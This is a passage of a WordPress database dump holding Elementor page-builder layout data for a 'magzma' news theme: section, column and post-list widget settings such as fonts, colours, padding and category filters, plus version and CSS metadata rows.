ap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1151,419,'_elementor_version','0.4'),(1152,419,'_elementor_css','a:3:{s:4:\"time\";i:1508855804;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1179,433,'_elementor_edit_mode','builder'),(1180,433,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"}